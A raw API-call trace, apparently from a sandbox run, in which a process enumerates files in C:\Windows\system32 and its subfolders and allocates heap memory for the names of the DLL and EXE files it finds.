[0027.690] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x250) returned 0x44c2d0 [0027.690] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\0409\\*", lpFindFileData=0x44c2d0 | out: lpFindFileData=0x44c2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44c528 [0027.693] FindNextFileW (in: hFindFile=0x44c528, lpFindFileData=0x44c2d0 | out: lpFindFileData=0x44c2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0027.693] FindNextFileW (in: hFindFile=0x44c528, lpFindFileData=0x44c2d0 | out: lpFindFileData=0x44c2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0027.693] FindClose (in: hFindFile=0x44c528 | out: hFindFile=0x44c528) returned 1 [0027.693] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c2d0 | out: hHeap=0x420000) returned 1 [0027.693] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8cc6e3c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xc8cc6e3c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xc8cecf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x867, dwReserved0=0x0, dwReserved1=0x0, cFileName="12520437.cpx", cAlternateFileName="")) returned 1 [0027.693] lstrlenW (lpString="12520437.cpx") returned 12 [0027.693] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c98834, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0x4c98834, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0xc8d130fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x8b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="12520850.cpx", cAlternateFileName="")) returned 1 [0027.693] lstrlenW (lpString="12520850.cpx") returned 12 [0027.693] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8699fd85, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8699fd85, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x869c5ee6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x20200, dwReserved0=0x0, dwReserved1=0x0, cFileName="aaclient.dll", cAlternateFileName="")) returned 1 [0027.693] lstrlenW (lpString="aaclient.dll") returned 12 [0027.693] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x44c2d0 [0027.693] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93cbbe2a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x93cbbe2a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x93d080eb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x38e200, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibilitycpl.dll", cAlternateFileName="")) returned 1 [0027.694] lstrlenW (lpString="accessibilitycpl.dll") returned 20 [0027.694] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xaa) returned 0x44c378 [0027.694] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c04678, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x89c04678, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xf0e28ef0, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x9a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCTRES.dll", cAlternateFileName="")) returned 1 [0027.694] lstrlenW (lpString="ACCTRES.dll") returned 11 [0027.694] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x44c430 [0027.694] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10f51da3, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x10f51da3, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7d217650, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="acledit.dll", cAlternateFileName="")) returned 1 [0027.694] lstrlenW (lpString="acledit.dll") returned 11 [0027.694] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x44c4d0 [0027.694] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d698b07, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x7d698b07, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7d217650, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1ea00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aclui.dll", cAlternateFileName="")) returned 1 [0027.694] lstrlenW (lpString="aclui.dll") returned 9 [0027.694] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x94) returned 0x44c570 [0027.694] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d3bd2e0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d3bd2e0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d3bd2e0, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x0, dwReserved1=0x0, cFileName="acppage.dll", cAlternateFileName="")) returned 1 [0027.694] lstrlenW (lpString="acppage.dll") returned 11 [0027.694] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x44c610 [0027.694] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c37918, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c37918, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c5da79, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActionCenter.dll", cAlternateFileName="")) returned 1 [0027.694] lstrlenW (lpString="ActionCenter.dll") returned 16 [0027.694] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xa2) returned 0x44c6b0 [0027.695] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c5da79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c5da79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c5da79, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x83400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActionCenterCPL.dll", cAlternateFileName="")) returned 1 [0027.695] lstrlenW (lpString="ActionCenterCPL.dll") returned 19 [0027.695] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xa8) returned 0x44c760 [0027.695] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9adf355b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9adf355b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9ae196bb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x31800, dwReserved0=0x0, dwReserved1=0x0, cFileName="activeds.dll", cAlternateFileName="")) returned 1 [0027.695] lstrlenW (lpString="activeds.dll") returned 12 [0027.695] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x44c810 [0027.695] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedc36d00, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xedc36d00, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xedb524c6, ftLastWriteTime.dwHighDateTime=0x1ca0412, nFileSizeHigh=0x0, nFileSizeLow=0x1b400, dwReserved0=0x0, dwReserved1=0x0, cFileName="activeds.tlb", cAlternateFileName="")) returned 1 [0027.695] lstrlenW (lpString="activeds.tlb") returned 12 [0027.695] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a81bf79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a81bf79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a8420d9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4ba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="actxprxy.dll", cAlternateFileName="")) returned 1 [0027.695] lstrlenW (lpString="actxprxy.dll") returned 12 [0027.695] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x44c8b8 [0027.695] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x554a4ec2, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x554a4ec2, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x65268bd0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x9800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdapterTroubleshooter.exe", cAlternateFileName="")) returned 1 [0027.695] lstrlenW (lpString="AdapterTroubleshooter.exe") returned 25 [0027.695] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xb4) returned 0x44c960 [0027.695] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa343f8c0, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xa343f8c0, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7d856840, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="admparse.dll", cAlternateFileName="")) returned 1 [0027.695] lstrlenW (lpString="admparse.dll") returned 12 [0027.695] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x44ca20 [0027.696] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c6129e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1c6129e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1c873fe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdmTmpl.dll", cAlternateFileName="")) returned 1 [0027.696] lstrlenW (lpString="AdmTmpl.dll") returned 11 [0027.696] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x44cac8 [0027.696] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2f573ca, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe2f573ca, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dbea0b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc200, dwReserved0=0x0, dwReserved1=0x0, cFileName="adprovider.dll", cAlternateFileName="")) returned 1 [0027.696] lstrlenW (lpString="adprovider.dll") returned 14 [0027.696] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9e) returned 0x44cb68 [0027.696] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b68a4f3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8b68a4f3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8b68a4f3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2da00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsldp.dll", cAlternateFileName="")) returned 1 [0027.696] lstrlenW (lpString="adsldp.dll") returned 10 [0027.696] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x44cc10 [0027.696] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9f1b122, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xf9f1b122, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dccd180, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x31800, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsldpc.dll", cAlternateFileName="")) returned 1 [0027.696] lstrlenW (lpString="adsldpc.dll") returned 11 [0027.696] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x44ccb0 [0027.696] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf66b897d, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xf66b897d, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dccd180, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsmsext.dll", cAlternateFileName="")) returned 1 [0027.696] lstrlenW (lpString="adsmsext.dll") returned 12 [0027.696] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x44cd50 [0027.696] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad634c2, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xfad634c2, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dcf4280, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3fa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsnt.dll", cAlternateFileName="")) returned 1 [0027.696] lstrlenW (lpString="adsnt.dll") returned 9 [0027.697] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x94) returned 0x44cdf8 [0027.697] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fc81ff4, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2fc81ff4, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf1def050, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa6200, dwReserved0=0x0, dwReserved1=0x0, cFileName="adtschema.dll", cAlternateFileName="")) returned 1 [0027.697] lstrlenW (lpString="adtschema.dll") returned 13 [0027.697] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9c) returned 0x44ce98 [0027.697] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdvancedInstallers", cAlternateFileName="ADVANC~1")) returned 1 [0027.697] lstrlenW (lpString="AdvancedInstallers") returned 18 [0027.697] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x250) returned 0x44cf40 [0027.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\AdvancedInstallers\\*", lpFindFileData=0x44cf40 | out: lpFindFileData=0x44cf40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44d198 [0027.698] FindNextFileW (in: hFindFile=0x44d198, lpFindFileData=0x44cf40 | out: lpFindFileData=0x44cf40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0027.698] FindNextFileW (in: hFindFile=0x44d198, lpFindFileData=0x44cf40 | out: lpFindFileData=0x44cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eb80ed5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8eb80ed5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8eba7035, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmiadapter.dll", cAlternateFileName="")) returned 1 [0027.698] lstrlenW (lpString="cmiadapter.dll") returned 14 [0027.698] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x44e1e0 [0027.698] FindNextFileW (in: hFindFile=0x44d198, lpFindFileData=0x44cf40 | out: lpFindFileData=0x44cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x964c1054, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x964c1054, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x965595d5, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1f2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmiv2.dll", cAlternateFileName="")) returned 1 [0027.698] lstrlenW (lpString="cmiv2.dll") returned 9 [0027.698] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xba) returned 0x44e2b0 [0027.699] FindNextFileW (in: hFindFile=0x44d198, lpFindFileData=0x44cf40 | out: lpFindFileData=0x44cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf919a2c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xbf919a2c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xacf3bdc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OEMHelpIns.dll", cAlternateFileName="")) returned 1 [0027.699] lstrlenW (lpString="OEMHelpIns.dll") returned 14 [0027.699] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x44e378 [0027.699] FindNextFileW (in: hFindFile=0x44d198, lpFindFileData=0x44cf40 | out: lpFindFileData=0x44cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf919a2c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xbf919a2c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xacf3bdc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OEMHelpIns.dll", cAlternateFileName="")) returned 0 [0027.699] FindClose (in: hFindFile=0x44d198 | out: hFindFile=0x44d198) returned 1 [0027.699] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44cf40 | out: hHeap=0x420000) returned 1 [0027.699] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b0c6f80, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9b0c6f80, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9b0ed0e0, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x9c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="advapi32.dll", cAlternateFileName="")) returned 1 [0027.699] lstrlenW (lpString="advapi32.dll") returned 12 [0027.699] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x44e448 [0027.699] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0777c0d, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xa0777c0d, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7de49f40, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="advpack.dll", cAlternateFileName="")) returned 1 [0027.699] lstrlenW (lpString="advpack.dll") returned 11 [0027.699] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x44e4f0 [0027.699] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e862c71, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x5e862c71, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x7de71040, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aecache.dll", cAlternateFileName="")) returned 1 [0027.699] lstrlenW (lpString="aecache.dll") returned 11 [0027.699] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x44e590 [0027.699] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c6f412, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x79c6f412, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0xf1f20320, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aeevts.dll", cAlternateFileName="")) returned 1 [0027.699] lstrlenW (lpString="aeevts.dll") returned 10 [0027.700] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x44e630 [0027.700] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2994413f, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x2994413f, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7e0609f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AltTab.dll", cAlternateFileName="")) returned 1 [0027.700] lstrlenW (lpString="AltTab.dll") returned 10 [0027.700] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x44e6d0 [0027.700] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74a8a79f, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0x74a8a79f, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x74803050, ftLastWriteTime.dwHighDateTime=0x1ca03fd, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="amcompat.tlb", cAlternateFileName="")) returned 1 [0027.700] lstrlenW (lpString="amcompat.tlb") returned 12 [0027.700] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a29ac8e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a29ac8e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a29ac8e, 